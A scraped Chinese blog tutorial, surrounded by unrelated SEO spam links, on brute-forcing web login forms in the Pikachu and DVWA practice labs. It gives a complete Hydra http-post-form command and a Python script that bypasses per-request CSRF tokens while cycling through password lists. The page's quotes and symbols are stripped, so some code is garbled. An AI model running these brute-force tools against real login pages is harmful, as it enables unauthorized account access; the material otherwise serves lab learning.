当前位置: 首页 > news >正文

常州公司网站模板建站福建设备公司网站

常州公司网站模板建站,福建设备公司网站,济南手机网站设计,百度知道问答首页文章目录 无token时的Hydra post登录框爆破带Token时的Hydra post登录框爆破 无token时的Hydra post登录框爆破 登录一个无验证码和token的页面#xff0c;同时抓包拦截 取出发送数据包#xff1a;usernameadbpassword133submitLogin 将用户名和密码替换 userna… 文章目录 无token时的Hydra post登录框爆破带Token时的Hydra post登录框爆破 无token时的Hydra post登录框爆破 登录一个无验证码和token的页面同时抓包拦截 取出发送数据包usernameadbpassword133submitLogin 将用户名和密码替换 usernameUSERpasswordPASSsubmitLogin 同时获取路径/pikachu/vul/burteforce/bf_form.php 拼接发送数据后就是 /pikachu/vul/burteforce/bf_form.php:usernameUSERpasswordPASSsubmitLogin 获取目标Ip192.168.180.2 获取登录失败时的错误提示username or password is not exists 启动hydra开始爆破 hydra -L /home/kali/dic/acount.txt -P /home/kali/dic/mima.txt -V -f 192.168.180.2 http-post-form “/pikachu/vul/burteforce/bf_form.php:usernameUSERpasswordPASSsubmitLogin:username or password is not exists” -f表示找到一个马上停止 带Token时的Hydra post登录框爆破 首先准备一个带token的登录页面 抓包可以看到存在token 提取其中的POST路径/dvwa/login.php 提取ip:192.168.180.2 然后准备一个python脚本将路径和ip替换到相应位置,如下所示 # -*- coding: utf-8 -*- import urllib import requests from bs4 import BeautifulSoup ##第一步先访问 http://127.0.0.1/login.php页面获得服务器返回的cookie和token def get_cookie_token(ip, url):headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Upgrade-Insecure-Requests:1}resrequests.get(url,headersheaders)cookiesres.cookiesa[(;.join([.join(item)for item in cookies.items()]))] ## a为列表存储cookie和tokenhtmlres.textsoupBeautifulSoup(html,html.parser)tokensoup.form.contents[3][value]a.append(token)return a##第二步模拟登陆 #ip 192.168.180.2 #url http://192.168.180.2/dvwa/login.php def Login(a,username,password, ip, url): #a是包含了cookie和token的列表headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Content-Length:88,Content-Type:application/x-www-form-urlencoded,Upgrade-Insecure-Requests:1,Cookie:a[0],Referer:url}values{username:username,password:password,Login:Login,user_token:a[1]}dataurllib.parse.urlencode(values)resprequests.post(url,datadata,headersheaders)return #重定向到index.php def getacount(ip, url):with open(acount.txt,r) as f:usersf.readlines()stop Falsefor user in users:if stop True:breakuseruser.strip(\n) #用户名with open(mima.txt,r) as file:passwdsfile.readlines()for passwd in passwds:passwdpasswd.strip(\n) #密码aget_cookie_token(ip, url) ##a列表中存储了服务器返回的cookie和tokeLogin(a,user,passwd, ip, url)headers{Host:ip,User-Agent:Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0,Accept:text/html,application/xhtmlxml,application/xml;q0.9,*/*;q0.8,Accept-Lanuage:zh-CN,zh;q0.8,en-US;q0.5,en;q0.3,Connection:keep-alive,Upgrade-Insecure-Requests:1,Cookie:a[0],Referer:url}responserequests.get(url,headersheaders)#print(len(response.text))content_size len(response.text)if content_size ! 1562: #如果登录成功print(用户名为%s ,密码为%s%(user,passwd)) #打印出用户名和密码stop Truebreak def main():ip 192.168.180.2url http://192.168.180.2/dvwa/login.phpgetacount(ip, url) if __name____main__:main()然后开启print(len(response.text))获取错误登录时的长度 可以看到错误时都是1523将该值替换到 if content_size ! 1523: #如果登录成功 同时注释print(len(response.text)) 可以看到顺利爆破出了用户名密码
http://www.hkea.cn/news/14541176/

相关文章:

  • seo公司哪家好用白云怎样优化网站建设
  • 学校网站模板 dedecms青岛建设银行银行招聘网站
  • 福建网站建设公wordpress移动
  • 网站创建怎么做游戏源码搭建
  • 免费毕业设计网站建设wordpress按钮灯箱
  • 无锡市锡山区建设局网站做安利能开个人网站
  • 专门做外国的网站有哪些以域名做网站关键词
  • 黑龙江建设厅网站官网seo算法是什么
  • 网络营销与传统营销的关系外贸网站推广优化
  • 一个销售网站的设计 应当是要汕头百度公司
  • 网站建站设计建设网站费用明细
  • 网站开发包含哪些类别中国住房和城乡建设部网站证书查询
  • 有关做服装的网站吗网店怎么开步骤
  • 通辽正规网站建设mysql 连接wordpress
  • 云南建设投资控股集团有限公司网站门户网站的建设和管理情况自查
  • 来自网站的临时会话公司网站怎么建立优化体系
  • 戚墅堰常州做网站做装饰公司网站6
  • 网站建设加班炫酷网站模板免费下载
  • 网站制作钱站长一般几个网站
  • 档案网站建设优秀代表seo搜索优化专员招聘
  • 成都网站开发企业网络推广就找南昌莫非传媒
  • 西安网站建设网络公司网站上的定位功能如何实现的
  • 网站建设电商学堂深圳制作网站培训学校
  • 孝感高新区建设局网站大连企业网站哪一家好
  • 手机网站存储登录信息网站建设广州天河区
  • 德州王霞网站建设泽成杭州seo网站推广排名
  • 做网站的例子网站开发项目扶持政策有哪些
  • 施工企业排名深圳网站优化服务
  • 自适应网站开发云优化 网站建设
  • 温州做网站最好的网站建设